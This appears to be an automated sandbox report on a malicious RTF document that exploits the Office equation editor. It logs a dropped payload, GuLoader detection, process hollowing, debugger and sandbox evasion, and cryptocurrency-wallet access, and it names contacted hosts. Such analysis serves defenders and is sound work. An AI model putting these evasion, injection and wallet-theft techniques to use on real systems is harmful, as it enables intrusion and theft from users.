      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: 8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtfReversingLabs: Detection: 41%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2532, type: MEMORY
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00405A50 push ebp; retf
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00405857 push es; ret
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00405A7E push ebp; retf
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270054 pushad ; ret
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002743E8 push es; ret
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002743C8 push es; ret
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270456 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1976Thread sleep time: -360000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 2788Thread sleep time: -240000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2824Thread sleep time: -120000s >= -30000s
      Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: vbc.exe, 00000003.00000002.2103520045.0000000000270000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270456 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000
      Hides threads from debuggersShow sources
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00270456 rdtsc
      Source: C:\Users\Public\vbc.exeCode function: 3_2_002733C6 LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00275E3C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027201E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00271842 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00272050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00275E50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_0027505E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00275571 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00272DAF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00271DAE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeCode function: 3_2_00271DAC mov eax, dword ptr fs:[00000030h]

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base address: 400000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
      Source: recommended.4NN.4.drBinary or memory string: [9:53:53 AM]<<Program Manager>>
      Source: recommended.4NN.4.drBinary or memory string: [9:54:03 AM]<<Program Manager>>
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files.zip VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files.zip VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files.zip VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\BPMLNOBVSB.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\CURQNKVOIX.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\DVWHKMNFNN.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\JSDNGYCOWY.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\JSDNGYCOWY.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\LTKMYBSEYZ.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NIKHQAIQAU.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NWTVCDUMOB.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\NWTVCDUMOB.pdf VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\WUTJSCBCFX.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\YPSIACHYXW.docx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\Files\YPSIACHYXW.xlsx VolumeInformation
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Tries to steal Crypto Currency WalletsShow sources
      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Users\Public\vbc.exeDirectory queried: C:\Users\user\Documents

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection112Masquerading111Input Capture11Query Registry1Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22LSASS MemorySecurity Software Discovery421Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion22SMB/Windows Admin SharesData from Local System11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol23SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 326325 Sample: 8825358c-c9a2-4b41-9da6-2ff... Startdate: 03/12/2020 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected GuLoader 2->44 46 Sigma detected: EQNEDT32.EXE connecting to internet 2->46 48 9 other signatures 2->48 8 EQNEDT32.EXE 12 2->8         started        13 WINWORD.EXE 336 18 2->13         started        15 EQNEDT32.EXE 2->15         started        process3 dnsIp4 34 144.168.239.55, 49165, 80 AS-COLOCROSSINGUS Canada 8->34 28 C:\Users\user\AppData\...\Apocalypst[1].exe, PE32 8->28 dropped 30 C:\Users\Public\vbc.exe, PE32 8->30 dropped 58 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->58 17 vbc.exe 1 8->17         started        file5 signatures6 process7 signatures8 36 Tries to detect Any.run 17->36 38 Hides threads from debuggers 17->38 40 Contains functionality to hide a thread from the debugger 17->40 20 vbc.exe 1 31 17->20         started        process9 dnsIp10 32 aap-ef.com 213.239.204.60, 443, 49166, 49167 HETZNER-ASDE Germany 20->32 50 Tries to detect Any.run 20->50 52 Sample uses process hollowing technique 20->52 54 Tries to steal Crypto Currency Wallets 20->54 56 2 other signatures 20->56 24 ilasm.exe 20->24         started        26 ilasm.exe 20->26         started        signatures11 process12

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      8825358c-c9a2-4b41-9da6-2ff1c62969d9.rtf42%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Apocalypst[1].exe0%ReversingLabs
      C:\Users\Public\vbc.exe0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      http://www.e-me.lv/repository00%URL Reputationsafe
      https://aap-ef.com/-0%Avira URL Cloudsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://www.acabogacia.org/doc00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl00%Avira URL Cloudsafe
      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
      http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
      http://www.acabogacia.org00%URL Reputationsafe
      http://www.acabogacia.org00%URL Reputationsafe
      http://www.acabogacia.org00%URL Reputationsafe
      http://www.certifikat.dk/repository00%Avira URL Cloudsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://www.chambersign.org10%URL Reputationsafe
      http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
      http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
      http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
      http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%Avira URL Cloudsafe
      http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl00%Avira URL Cloudsafe
      http://www.post.trust.ie/reposit/cps.html00%Avira URL Cloudsafe
